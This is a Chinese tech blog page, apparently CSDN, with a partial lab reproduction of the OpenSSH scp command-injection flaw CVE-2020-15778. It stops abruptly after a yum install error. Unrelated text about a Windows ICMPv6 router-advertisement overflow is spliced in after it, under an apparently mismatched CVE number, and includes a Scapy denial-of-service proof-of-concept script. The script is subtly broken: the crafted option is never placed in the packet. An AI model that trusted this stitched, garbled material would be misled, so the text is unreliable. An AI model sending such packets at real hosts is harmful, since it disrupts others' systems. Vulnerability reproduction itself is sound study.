CVE-2020-15778漏洞复现学习

本文详细介绍了CVE-2020-15778漏洞,该漏洞允许在OpenSSH 8.3p1及更早版本中注入命令,执行任意命令。通过环境搭建、iptables策略配置,演示了如何在禁用SSH登录仅保留SCP的情况下,利用此漏洞进行命令执行。文章还提供了漏洞复现步骤和总结,强调了此漏洞的危害和利用条件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.漏洞描述

先领282G网络安全资料再阅读

(1)简介:2020年6月9日,研究人员Chinmay
Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。该漏洞属于命令执行漏洞,目前绝大多数linux系统受影响。

(2)scp介绍:scp是Linux下基于 ssh
登陆进行安全的远程文件拷贝命,用于不同Linux系统之间复制文件和目录。该命令由openssh的scp.c及其他相关代码实现。在本次漏洞复现中就是利用scp命令把一个kali系统的文件传输给Linux系统。

(3)漏洞类型:命令执行

(4)漏洞影响版本:OpenSSH <= 8.3p1

2.环境搭建

虚拟机安装CentOS和kali靶机环境:CentOS6,ip:192.168.5.138渗透机环境:Kali 2020,ip:192.168.5.130

3.centos机使用iptables策略配置环境,禁用ssh登录,只保留scp。

(1)安装iptables(需要root用户)

yum install -y iptables

安装错误,接下来根据提示删除/var/cache/yum/i386/6/

关于 CVE-2020-24686 漏洞,其主要影响的是 Windows TCP/IP 协议栈中的 ICMPv6 路由器广告处理部分。此漏洞源于对递归 DNS 服务器选项(Type 25)的不当解析,特别是当长度字段设置为偶数值时引发的缓冲区溢出问题[^4]。 以下是针对该漏洞复现所需的关键要素: ### 实验环境搭建 为了成功复现 CVE-2020-24686 漏洞,需准备如下实验环境: 1. **目标操作系统**: 需要运行受影响版本的 Windows 系统,具体包括但不限于 Windows 10 Version 20H2、Windows Server, version 20H2 (Server Core installation) 和其他受支持的操作系统版本。 2. **网络配置**: 设置一个测试网络环境,其中包含一台作为攻击者的机器以及另一台安装有易受攻击操作系统的主机。 3. **工具需求**: - Scapy 或者类似的 Python 库用于构建自定义的 ICMPv6 数据包。 - Wireshark 可选,用来捕获并分析流量以便验证发送的数据包结构是否正确。 ### POC 编写 下面是一个简单的基于 Scapy 的 PoC 示例脚本,它会向指定的目标设备发送恶意构造的 ICMPv6 Router Advertisement 包含非法长度值的 Type 25 Option: ```python from scapy.all import * def exploit(target_ip): eth = Ether(dst="ff:ff:ff:ff:ff:ff") # 广播MAC地址 ip6 = IPv6(src="::", dst=target_ip) icmp6_ra = ICMPv6ND_RA() rdnss_opt = ICMPv6NDOptRDNSS(length=2) # 使用不符合RFC标准的偶数长度 payload = "\x00" * ((rdnss_opt.length*8)-len(rdnss_opt.fields_desc)) + struct.pack("!Q", 0xdeadbeefcafebabe) packet = eth/ip6/icmp6_ra/Raw(load=payload) sendp(packet, iface="eth0") if __name__ == "__main__": target_ip = "fe80::xxxx:yyyy:zzzz:wwww" # 替换为目标的实际链路本地IPV6地址 exploit(target_ip) ``` 上述代码片段通过创建具有特定畸形参数的ICMPv6消息来触发潜在的安全风险。注意替换 `target_ip` 参数为你实际环境中受害节点的有效IPv6链接局部地址。 ### 注意事项 尽管提供了理论基础和技术细节供学习研究之用,在真实世界里实施此类行为违反法律和服务条款规定。仅限于授权范围内的渗透测试活动才允许尝试这些技术手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值